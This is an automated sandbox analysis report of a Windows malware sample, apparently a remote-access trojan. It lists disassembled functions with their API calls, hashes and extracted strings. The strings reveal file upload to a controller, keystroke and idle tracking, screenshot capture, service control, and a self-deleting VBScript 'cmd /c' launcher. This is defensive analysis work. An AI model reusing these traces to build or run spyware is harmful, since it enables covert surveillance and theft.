                                                                                          • CreatePopupMenu.USER32 ref: 0041B420
                                                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                          • String ID: Close
                                                                                          • API String ID: 1657328048-3535843008
                                                                                          • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                                                                          • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                                                                                          • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                                                                          • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                                                                                          Function 00443268 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$Info
                                                                                          • String ID:
                                                                                          • API String ID: 2509303402-0
                                                                                          • Opcode ID: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                                                                                          • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                                                                                          • Opcode Fuzzy Hash: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                                                                                          • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                                                                                          Function 00407BB6 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                                                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                                                                                          • __aulldiv.LIBCMT ref: 00407D89
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                                                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                                                                                          • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408038
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                          • API String ID: 3086580692-2596673759
                                                                                          • Opcode ID: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                                                                                          • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
                                                                                          • Opcode Fuzzy Hash: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                                                                                          • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
                                                                                          Function 0041A47D Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegEnumKeyExA.ADVAPI32 ref: 0041A47F
                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0041A4B0
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A749
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEnumOpen
                                                                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$UninstallString
                                                                                          • API String ID: 1332880857-3730529168
                                                                                          • Opcode ID: 990104b7cba7af691029d385b930f1776e062702f879198157bcb1f4d53fc8db
                                                                                          • Instruction ID: 4431336161eaad6e2d2aa402c01db4654b3b7c935e82bf046b55a61e03329e01
                                                                                          • Opcode Fuzzy Hash: 990104b7cba7af691029d385b930f1776e062702f879198157bcb1f4d53fc8db
                                                                                          • Instruction Fuzzy Hash: 966132311182419BC328EB51D891EEFB3E8EF94348F50493FF586921E2EF749949CA5A
                                                                                          Function 0040C3B8 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                                                                            • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                                                                            • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                                                                            • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                                                                            • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                                                                                          • ExitProcess.KERNEL32 ref: 0040C57D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                                                                                          • API String ID: 1913171305-2600661426
                                                                                          • Opcode ID: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                                                                                          • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                                                                                          • Opcode Fuzzy Hash: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                                                                                          • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
                                                                                          Function 004048A8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • connect.WS2_32(?,?,?), ref: 004048C0
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                                                                                          • WSAGetLastError.WS2_32 ref: 00404A01
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                          • API String ID: 994465650-2151626615
                                                                                          • Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                                                                                          • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                                                                                          • Opcode Fuzzy Hash: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                                                                                          • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF
                                                                                          Function 00452DBB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00452A89: CreateFileW.KERNEL32(?,00000008,00000007,d.E,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                                                                                          • __dosmaperr.LIBCMT ref: 00452ED6
                                                                                          • GetFileType.KERNEL32(00000000), ref: 00452EE2
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                                                                                          • __dosmaperr.LIBCMT ref: 00452EF5
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00452F15
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0045305F
                                                                                          • GetLastError.KERNEL32 ref: 00453091
                                                                                          • __dosmaperr.LIBCMT ref: 00453098
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                          • String ID: H
                                                                                          • API String ID: 4237864984-2852464175
                                                                                          • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                                                                          • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
                                                                                          • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                                                                          • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
                                                                                          Function 00413606 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 65535$udp
                                                                                          • API String ID: 0-1267037602
                                                                                          • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                                                                          • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                                                                                          • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                                                                          • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                                                                                          Function 00409C1F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 00409C81
                                                                                          • Sleep.KERNEL32(000001F4), ref: 00409C8C
                                                                                          • GetForegroundWindow.USER32 ref: 00409C92
                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                                                                                          • Sleep.KERNEL32(000003E8), ref: 00409D9D
                                                                                            • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                                                          • API String ID: 911427763-3954389425
                                                                                          • Opcode ID: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                                                                                          • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                                                                                          • Opcode Fuzzy Hash: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                                                                                          • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A
                                                                                          Function 0040C5ED Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LongNamePath
                                                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                          • API String ID: 82841172-425784914
                                                                                          • Opcode ID: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                                                                                          • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                                                                                          • Opcode Fuzzy Hash: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                                                                                          • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F
                                                                                          Function 004385DA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                                                                                          • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                                                                                          • __dosmaperr.LIBCMT ref: 00438646
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                                                                                          • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                                                                                          • __dosmaperr.LIBCMT ref: 00438683
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                                                                                          • __dosmaperr.LIBCMT ref: 004386D7
                                                                                          • _free.LIBCMT ref: 004386E3
                                                                                          • _free.LIBCMT ref: 004386EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                          • String ID:
                                                                                          • API String ID: 2441525078-0
                                                                                          • Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                                                                                          • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                                                                                          • Opcode Fuzzy Hash: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                                                                                          • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                                                                                          Function 0044DC05 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 204COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID: pF$tF
                                                                                          • API String ID: 269201875-2954683558
                                                                                          • Opcode ID: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                                                                          • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
                                                                                          • Opcode Fuzzy Hash: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                                                                          • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
                                                                                          Function 00405480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetEvent.KERNEL32(?,?), ref: 0040549F
                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                                                                                          • TranslateMessage.USER32(?), ref: 0040555E
                                                                                          • DispatchMessageA.USER32(?), ref: 00405569
                                                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                                                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                          • API String ID: 2956720200-749203953
                                                                                          • Opcode ID: 38da9913c1d94b4fc4e25114756b75ad617155bf13c772cc5ff9b28bcc7bf55c
                                                                                          • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                                                                                          • Opcode Fuzzy Hash: 38da9913c1d94b4fc4e25114756b75ad617155bf13c772cc5ff9b28bcc7bf55c
                                                                                          • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                                                                                          Function 0041601D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00416123
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 00416132
                                                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                          • String ID: <$@$@%G$@%G$Temp
                                                                                          • API String ID: 1704390241-4139030828
                                                                                          • Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                                                                                          • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                                                                                          • Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                                                                                          • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                                                                                          Function 00418AC3 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                                                                                          • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                                                                                          • Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                                                                                          • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                                                                                          Function 00445631 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 00445645
                                                                                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                          • _free.LIBCMT ref: 00445651
                                                                                          • _free.LIBCMT ref: 0044565C
                                                                                          • _free.LIBCMT ref: 00445667
                                                                                          • _free.LIBCMT ref: 00445672
                                                                                          • _free.LIBCMT ref: 0044567D
                                                                                          • _free.LIBCMT ref: 00445688
                                                                                          • _free.LIBCMT ref: 00445693
                                                                                          • _free.LIBCMT ref: 0044569E
                                                                                          • _free.LIBCMT ref: 004456AC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                                                                          • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                                                                                          • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                                                                          • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                                                                                          Function 00417F6A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00417F6F
                                                                                          • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                                                                                          • Sleep.KERNEL32(000003E8), ref: 004180B3
                                                                                          • GetLocalTime.KERNEL32(?), ref: 004180BB
                                                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                          • API String ID: 489098229-3790400642
                                                                                          • Opcode ID: e53bd955e1239445be9f05899463632c52afdf35a26c57d2f447966bafceb32c
                                                                                          • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                                                                                          • Opcode Fuzzy Hash: e53bd955e1239445be9f05899463632c52afdf35a26c57d2f447966bafceb32c
                                                                                          • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
                                                                                          Function 0040971E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 163sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00001388), ref: 00409738
                                                                                            • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                                                                            • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                                                                            • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                                                                            • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                                                                                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
